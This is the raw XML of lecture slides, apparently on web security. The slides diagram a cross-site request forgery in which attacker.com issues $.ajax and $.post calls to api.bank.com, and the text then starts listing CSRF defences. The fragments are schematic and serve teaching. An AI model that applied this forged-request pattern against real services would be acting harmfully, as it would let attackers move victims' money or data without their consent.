                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8541B32-7463-7024-B9B4-8BCC3343A208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5936457" y="1736117"/>
            <a:ext cx="1092800" cy="34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 defTabSz="22860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500" b="0">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="Monaco" charset="0"/>
                <a:cs typeface="Monaco" charset="0"/>
                <a:sym typeface="Monaco" charset="0"/>
              </a:rPr>
              <a:t>GET /account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD0EA8A-669D-644D-D98D-FE80B1C16BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9763290" y="2443783"/>
            <a:ext cx="1279197" cy="282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00"/>
              <a:t>api.bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48141" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A217B5B9-093F-038E-A2FC-3B946214DC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650" y="1754982"/>
            <a:ext cx="258763" cy="257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8142" name="Text Box 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50D6511B-16ED-F6C9-1855-B5780F6E6C9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1734063" y="1778620"/>
            <a:ext cx="1230080" cy="282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00"/>
              <a:t>attacker.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48143" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E917C0-4FE2-30E0-448E-08944DD02D03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1252538" y="2304115"/>
            <a:ext cx="4219104" cy="259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50" b="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350" b="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>({url: “api.bank.com/account“, …})</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48144" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39E8C2FF-8397-0755-C365-C92CF0AEF2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9957" y="1754982"/>
            <a:ext cx="257969" cy="257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8145" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CA0B2F7-6A8A-E048-400A-0D1755DCE8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0" y="2222500"/>
            <a:ext cx="590550" cy="589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8146" name="AutoShape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC5160E-5570-8C65-F9DF-156C7D52E31D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="860425" y="3218657"/>
            <a:ext cx="10471150" cy="1512094"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4935"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="EE220C"/>
            </a:solidFill>
            <a:miter lim="4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41275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b="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue Medium" charset="0"/>
              <a:ea typeface="Helvetica Neue Medium" charset="0"/>
              <a:cs typeface="Helvetica Neue Medium" charset="0"/>
              <a:sym typeface="Helvetica Neue Medium" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48150" name="Line 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB98E1F-05DB-8FBC-0DDF-145DB7E3059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8200" y="3829050"/>
            <a:ext cx="3268663" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1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defTabSz="29210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000" b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" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:ea typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:sym typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48151" name="AutoShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0278E3E1-F2D1-3FC4-1D72-88CA12858980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069975" y="3409157"/>
            <a:ext cx="4568032" cy="1130300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8690"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng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>
            <a:outerShdw blurRad="50800" dist="25400" dir="3599997" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr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29210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b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" charset="0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48152" name="AutoShape 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F95DFD8-CC0C-2635-D766-9CFABD3DB15E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1089025" y="3421063"/>
            <a:ext cx="4529932" cy="5151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0" y="4117"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2980"/>
                  <a:pt x="52" y="1951"/>
                  <a:pt x="136" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="461"/>
                  <a:pt x="336" y="0"/>
                  <a:pt x="464" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21136" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21264" y="0"/>
                  <a:pt x="21380" y="461"/>
                  <a:pt x="21464" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21548" y="1951"/>
                  <a:pt x="21600" y="2980"/>
                  <a:pt x="21600" y="4117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CDEE0"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1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defTabSz="29210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950" b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panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:ea typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:sym typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{647EA045-F7B4-F79A-51CB-7215576042CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1162050" y="3636169"/>
            <a:ext cx="426244" cy="83344"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="851440" cy="165758"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Oval 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEADBDE7-A5AB-0A6D-4B67-790D5FA38A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786" y="0"/>
              <a:ext cx="169654" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00882B"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr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1pPr>
              <a:lvl2pPr marL="742950" indent="-28575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2pPr>
              <a:lvl3pPr marL="11430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3pPr>
              <a:lvl4pPr marL="16002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4pPr>
              <a:lvl5pPr marL="20574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5pPr>
              <a:lvl6pPr marL="25146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6pPr>
              <a:lvl7pPr marL="29718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7pPr>
              <a:lvl8pPr marL="34290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8pPr>
              <a:lvl9pPr marL="38862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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="2921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0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Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Oval 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F811165-E71F-C891-A9EB-9DA0E832F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893" y="0"/>
              <a:ext cx="169653" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F5D328"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr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1pPr>
              <a:lvl2pPr marL="742950" indent="-28575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2pPr>
              <a:lvl3pPr marL="11430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3pPr>
              <a:lvl4pPr marL="16002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4pPr>
              <a:lvl5pPr marL="20574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5pPr>
              <a:lvl6pPr marL="25146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6pPr>
              <a:lvl7pPr marL="29718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7pPr>
              <a:lvl8pPr marL="34290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8pPr>
              <a:lvl9pPr marL="38862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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="2921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0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Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Oval 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F4A8869-8B0B-2618-4D2D-E91E09C9704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69654" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr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1pPr>
              <a:lvl2pPr marL="742950" indent="-28575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2pPr>
              <a:lvl3pPr marL="11430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3pPr>
              <a:lvl4pPr marL="16002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4pPr>
              <a:lvl5pPr marL="2057400" indent="-228600" algn="ctr" defTabSz="5842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5pPr>
              <a:lvl6pPr marL="25146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6pPr>
              <a:lvl7pPr marL="29718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7pPr>
              <a:lvl8pPr marL="34290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8pPr>
              <a:lvl9pPr marL="38862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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="2921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0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Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48157" name="Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A9BA924-CA3C-FCD7-9795-65CD310919D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1724819" y="3548857"/>
            <a:ext cx="3724275" cy="25796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25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr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 defTabSz="584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29210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b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" charset="0"/>
              <a:ea typeface="Gill Sans" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
              <a:sym typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6894B2F-8B91-FF3E-6345-3AC529F17D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525" y="3594100"/>
            <a:ext cx="191294" cy="167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8159" name="Line 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F8F506-928B-991D-5590-54317CA888D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81032" y="4275138"/>
            <a:ext cx="2286000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="101600" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1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58420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58420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defTabSz="29210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000" b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" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:ea typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:sym typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48154" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28C6DF79-DE14-6123-B68F-9FE8151AB6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569" y="3385344"/>
            <a:ext cx="529431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8155" name="Text Box 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD694AB-364F-597A-FD8D-547B46BB5ED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5936457" y="3493480"/>
            <a:ext cx="1185517" cy="34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 defTabSz="22860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500" b="0">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="Monaco" charset="0"/>
                <a:cs typeface="Monaco" charset="0"/>
                <a:sym typeface="Monaco" charset="0"/>
              </a:rPr>
              <a:t>POST /transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48156" name="Text Box 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E791217A-C94E-178F-DE2E-8FC3C559968F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9763290" y="4201939"/>
            <a:ext cx="1279197" cy="282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00"/>
              <a:t>api.bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B971BDCE-F48A-71CC-2A25-FC43E924CB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650" y="3512344"/>
            <a:ext cx="258763" cy="257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8158" name="Text Box 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{829C9EDF-FA9B-FC60-4E18-55E37856F1FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1734063" y="3536777"/>
            <a:ext cx="1230080" cy="282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00"/>
              <a:t>attacker.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE125C92-D163-D48C-DE09-EFF9109CC4CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1252538" y="4062272"/>
            <a:ext cx="4219104" cy="259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 defTabSz="4572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 defTabSz="2286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50" b="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350" b="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>({url: “api.bank.com/account“, …})</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48160" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5C1B9E1-6690-1F6D-17F5-D854F3400F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9957" y="3512344"/>
            <a:ext cx="257969" cy="257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8161" name="Picture 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047ACD03-2931-9BF4-0C2C-FE1BFE044E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0" y="3979863"/>
            <a:ext cx="59055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8162" name="Rectangle 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C120C5-3015-F30C-5D27-B32A30ABA899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2487613" y="4960938"/>
            <a:ext cx="8868569" cy="1549400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B51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 algn="ctr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 defTabSz="41275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750" b="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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Cookie-based authentication is not sufficient </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="3750" b="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3750" b="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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for requests that have any side affect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48163" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8261D306-9800-0711-AEFC-BAE017F78A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38" y="4960938"/>
            <a:ext cx="1653382" cy="1653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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ADE00EF-43D5-C941-8B17-A5D541783CB8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Preventing CSRF Attacks</a:t>
            </a:r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11C7856B-F906-EB87-6367-04F1C92E0FDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10714832" cy="4681538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="319088" indent="-65088" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Cookies do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not indicate whether an authorized application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>submitted request since they’re included in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> (in-scope) request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="319088" indent="-65088" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>We need another mechanism that allows us to ensure that a request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>is authentic (coming from a trusted page)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="319088" indent="-65088" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Four commonly used techniques: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="319088" indent="-65088" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="319088" indent="-65088" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> Secret Validation Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="319088" indent="-65088" eaLnBrk="1">
